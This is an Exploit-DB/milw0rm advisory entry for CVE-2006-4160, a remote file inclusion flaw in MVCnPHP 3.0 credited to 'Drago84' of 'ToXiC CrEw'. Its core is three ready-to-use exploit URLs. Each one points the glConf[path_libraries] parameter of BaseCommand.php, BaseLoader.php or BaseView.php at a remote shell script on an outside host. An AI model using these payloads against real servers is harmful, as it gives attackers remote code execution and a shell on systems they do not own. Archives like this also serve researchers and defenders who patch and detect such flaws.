MVCnPHP <= 3.0 - glConfpath_libraries Remote Include Vulnerabilities

2006-08-10T00:00:00
ID EDB-ID:2173
Type exploitdb
Reporter Drago84
Modified 2006-08-10T00:00:00

Description

MVCnPHP <= 3.0 glConf[path_libraries] Remote Include Vulnerabilities. CVE-2006-4160. Webapps exploit for php platform

                                        
                                            MVCnPHP Remote File Inclusion

############ToXiC CrEw###############

Bug Found by Drago84

Page  Sources:
http://freshmeat.net/redir/mvcnphp/46123/url_tgz/Geeklog_MVCnPHP-3.0.0.tgz

Page Affect:
BaseCommand.php
BaseLoader.php
BaseView.php

ExP:
http://www.sito.com/dir_mvcnphp/BaseCommand.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseLoader.php?glConf[path_libraries]=http://evalsite.com/shell.php
http://www.sito.com/dir_mvcnphp/BaseView.php?glConf[path_libraries]=http://evalsite.com/shell.php

# milw0rm.com [2006-08-10]